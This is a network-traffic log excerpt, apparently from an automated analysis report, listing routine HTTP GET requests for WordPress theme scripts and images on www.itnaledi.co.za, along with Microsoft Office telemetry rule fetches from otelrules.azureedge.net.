          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/build/third-party/superfish.js?ver=1.5.8 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/build/third-party/hoverintent.min.js?ver=1.9 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/plugins/salient-core/js/third-party/touchswipe.min.js?ver=1.0 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/build/init.js?ver=15.0.6 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/build/third-party/magnific.js?ver=7.0.1 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/build/third-party/vivus.min.js?ver=6.0.1 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/build/elements/nectar-testimonial-slider.js?ver=15.0.6 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-includes/js/comment-reply.min.js?ver=6.1.7 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/build/third-party/anime.min.js?ver=4.5.1 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/plugins/js_composer_salient/assets/js/dist/js_composer_front.min.js?ver=6.9.1 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/microsoft-1.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/plugins/salient-portfolio/js/third-party/caroufredsel.min.js?ver=7.0.1 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/build/third-party/superfish.js?ver=1.5.8 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/image-1.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/build/third-party/vivus.min.js?ver=6.0.1 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/2.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/western-cape.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-includes/js/comment-reply.min.js?ver=6.1.7 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/plugins/js_composer_salient/assets/js/dist/js_composer_front.min.js?ver=6.9.1 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/superior.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/site.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/microsoft-1.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/marine-water.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/build/init.js?ver=15.0.6 HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/lexmark.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/image-1.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/lewis.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/western-cape.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/city-of-cape-town.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/chevron.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/2.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/cape-union-mart.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/superior.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/site.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/cape-nature.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/building-industry.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/marine-water.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/lexmark.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/axis.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/lewis.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
